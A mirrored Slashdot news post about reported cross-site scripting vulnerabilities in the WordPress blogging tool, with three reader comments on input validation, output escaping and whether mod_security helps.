Slashdot Mirror

← Back to Stories (view on slashdot.org)

Vulnerabilities Found in WordPress Blogging Tool

Posted by michael on from the say-it-ain't-so dept.

ZuperDee writes "According to this Netcraft article, 'Security vulnerabilities have been found in WordPress, the popular PHP-based open source blogging application. Some scripts in WordPress are not properly validated, leaving the program open to cross-site scripting (XSS) attacks in which third parties could insert content into a WordPress-driven site.'"

3 of 12 comments (clear)

  1. Uh... This is News? by angst_ridden_hipster · · Score: 3, Interesting

    If you read Bugtraq and/or Websec, you'll see a dozen of this kind of vulnerability each week.

    There's still a lot of XSS bugs in a lot of products. And new ones get added all the time.

    Just be careful out there, kids. Don't trust input. Barely trust output.

    --
    Eloi, Eloi, lema sabachtani?
    www.fogbound.net
  2. Re:Stupid design. That's what it is. by Anonymous Coward · · Score: 1, Interesting

    As a web developer, I _ALWAYS_ escape my output, and _ALWAYS_ preprocess my input.

    As a C developer I _ALWAYS_ check my array indexes, and _ALWAYS_ allocate buffers of the right length.

    Except, not every developer is as smart as you or I. Plus I get tired of typing that escape function, yah know?

    After every freakin' PHP app on the planet has an XSS attack, then maybe people will figure this out.

    i.e. make the thing output XML. Then use your favorite XSLT stylesheet to filter it.

    Oh yeah, that makes a lot of sense for a 1-page PHP script.

    Programmer ego shouldn't get in the way of solving an obvious problem.

  3. can mod_security help? by scaturan · · Score: 2, Interesting

    i'm using mod_security, but not sure if it'll prevent or slow down XSS attacks. can anyone advice me on this? or do i have to wait for WP developers for a patch.